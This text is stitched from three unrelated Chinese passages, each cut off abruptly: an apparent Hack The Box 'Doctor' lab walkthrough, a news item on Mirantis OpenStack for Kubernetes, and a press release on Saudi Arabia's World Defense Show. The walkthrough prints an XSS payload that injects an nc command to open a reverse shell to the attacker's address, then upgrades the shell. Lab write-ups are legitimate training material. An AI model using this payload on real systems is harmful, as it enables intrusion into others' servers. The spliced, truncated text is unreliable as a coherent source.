shaun

HTB Doctor（Easy） 地址：https://www.hackthebox.eu/home/machines/profile/278 基本信息 在进行渗透之前需要将HTB与kali进行连接，建立连接之后才可以进行渗透 一、信息收集 靶机地址为10.10.10.209 使用nmap对靶机进行扫描 nmap - sC - sV - sT - O - A 10.10 .10 .209 开放了22,80,8089三个端口 8089对应的服务为splunk 二、访问80端口 需要添加一条hosts命令才可以访问其他内容 三、访问doctors.htb vim hosts 10.10 .10 .209 doctors . htb 进入页面后尝试万能登陆密码，但是失败了 注册用户进行登录看看是否有可利用的信息，发现可能存在xss漏洞，可以构造xss代码反弹shell < img src = http : / / 10.10 .14 .3 / $ ( nc . traditional$ IFS - e$ IFS / bin / bash$ IFS '10.10.14.3' $ IFS '1234' ) > 成功反弹，获取交互式shell python3 - c 'import pty;pty.spawn("/bin/bash")' 进入home目录查看是否有可利用信息

上周，Mirantis推出了Mirantis OpenStack for Kubernetes。这是一个开源云管理框架的实例，其中所有组件都封装在容器中。 Mirantis的CTO Shaun O'Meara表示，这种方法使得用Kubernetes来编排这些容器成为可能。 Mirantis OpenStack for Kubernetes是Mirantis Cloud Native Platform一系列改进中的第一个——Mirantis Cloud Native Platform是基于Kubernetes的一系列产品，其中包括Mirantis Container Cloud（之前称为Docker Enterprise，由Mirantis在去年收购）。 O'Meara说，目标是使部署、管理和更新一个广泛使用的云管理框架更加容易，该框架在开放基础设施基金会（Open Infrastructure Foundation）的支持下继续得到改进。 O'Meara指出，这种方法还可以在虚拟机或裸金属服务器上部署OpenStack，甚至OpenStack最频繁部署的基于内核的虚拟机（KVM）也被封装在一个容器中。 O'Meara指出，Kubernetes的裸金属实例正在金融服务公司、基于机器学习算法构建人工智能（AI）应用程序的组织和电信运营商兴起—

每两年举行一次的 “ 世界防务展 ” 将展示空军、陆军、海军、安全和卫星防御系统互操作性方面的最新创新 沙特利雅得--(美国商业资讯)--今天，沙特军事工业总局(GAMI)宣布推出“世界防务展”(World Defense Show)。该展会将成为全球防务巡展的中心舞台，为参展商和参观者提供参与沙特首次真正意义综合防务展的机会。 此新闻稿包含多媒体内容。完整新闻稿可在以下网址查阅： https://www.businesswire.com/news/home/20200716006046/en/ 世界防务展由GAMI创立，重点关注空军、陆军、海军、安全创新防御技术和卫星防御系统的互操作性。首届活动定于2022年3月6日至9日举行，之后每两年在沙特首都利雅得举行一次。 GAMI负责人Ahmad Al Ohali阁下在国际防务公司出席的线上新闻发布会上表示： “ 由于技术正在加快全球防务工业的发展速度，防务方面的考虑正变得日益复杂。有必要设立一个平台，使防务界能够集合并共同考虑我们所有人面临的巨大机遇和挑战。正因为此，我们推出世界防务展，这是一个创新平台，通过现场和虚拟演示展示互操作性可能为以下五个防务领域带来的变化：空军、陆军、海军、安全和卫星。 ” 他补充道： “ 没有比沙特更适合组织如此大规模防务活动的地方了。作为 G20 国家，沙特是世界上防务支出最高的国家之一